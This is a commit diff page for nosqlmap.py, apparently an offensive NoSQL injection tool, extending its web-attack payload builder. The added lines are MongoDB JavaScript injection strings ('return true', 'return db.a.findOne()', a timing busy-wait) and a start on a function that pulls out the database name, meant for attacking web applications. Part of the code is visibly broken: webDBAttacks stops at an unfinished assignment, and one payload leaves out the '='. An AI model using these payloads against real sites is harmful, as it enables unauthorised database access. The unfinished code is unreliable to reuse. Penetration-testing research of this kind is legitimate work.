Skip to content

Commit 56b02fe

Browse files
committed
Started coding DB attacks via web
1 parent dd1a8cd commit 56b02fe

File tree

1 file changed

+19
-5
lines changed

1 file changed

+19
-5
lines changed

nosqlmap.py

Lines changed: 19 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -406,6 +406,8 @@ def webApps():
406406
appUp = False
407407
strTbAttack = False
408408
intTbAttack = False
409+
trueStr = False
410+
trueInt = False
409411

410412
#Verify app is working.
411413
print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."
@@ -694,6 +696,16 @@ def webApps():
694696
raw_input("Press enter to continue...")
695697
return()
696698

699+
def webDBAttacks(trueLen):
700+
nameLen = 0
701+
injTestLen = 0
702+
getDBName = raw_input("Get database name? ")
703+
704+
if getDBName == "y" or getDBName == "Y":
705+
while injTestLen != trueLen:
706+
tempUri =
707+
708+
697709
def randInjString(size):
698710
print "What format should the random string take?"
699711
print "1-Alphanumeric"
@@ -730,7 +742,7 @@ def buildUri(origUri, randValue):
730742
paramName = []
731743
paramValue = []
732744
global uriArray
733-
uriArray = ["","","","","","","","","","","","","",""]
745+
uriArray = ["","","","","","","","","","","","","","","",""]
734746
injOpt = ""
735747

736748
#Split the string between the path and parameters, and then split each parameter
@@ -763,8 +775,6 @@ def buildUri(origUri, randValue):
763775
raw_input("Something went wrong. Press enter to return to the main menu...")
764776
mainMenu()
765777

766-
#print "debug:"
767-
#print split_uri[0]
768778

769779
x = 0
770780
uriArray[0] = split_uri[0] + "?"
@@ -798,7 +808,8 @@ def buildUri(origUri, randValue):
798808
uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy=\"!" + "&"
799809
uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
800810
uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
801-
811+
uriArray[14] += paramName[x] + "a'; return true; var dum=a'"
812+
uriArray[15] += paramName[x] + "1; return true; var dum=2"
802813

803814
else:
804815
uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
@@ -815,7 +826,8 @@ def buildUri(origUri, randValue):
815826
uriArray[11] += paramName[x] + "=" + paramValue[x] + "&"
816827
uriArray[12] += paramName[x] + "=" + paramValue[x] + "&"
817828
uriArray[13] += paramName[x] + "=" + paramValue[x] + "&"
818-
829+
uriArray[14] += paramName[x] + "=" + paramValue[x] + "&"
830+
uriArray[15] += paramName[x] + "=" + paramValue[x] + "&"
819831
x += 1
820832

821833
#Clip the extra & off the end of the URL
@@ -833,6 +845,8 @@ def buildUri(origUri, randValue):
833845
uriArray[11] = uriArray[11][:-1]
834846
uriArray[12] = uriArray[12][:-1]
835847
uriArray[13] = uriArray[13][:-1]
848+
uriArray[14] = uriArray[14][:-1]
849+
uriArray[15] = uriArray[15][:-1]
836850
return uriArray[0]
837851

838852
def stealDBs(myDB):

0 commit comments

Comments
 (0)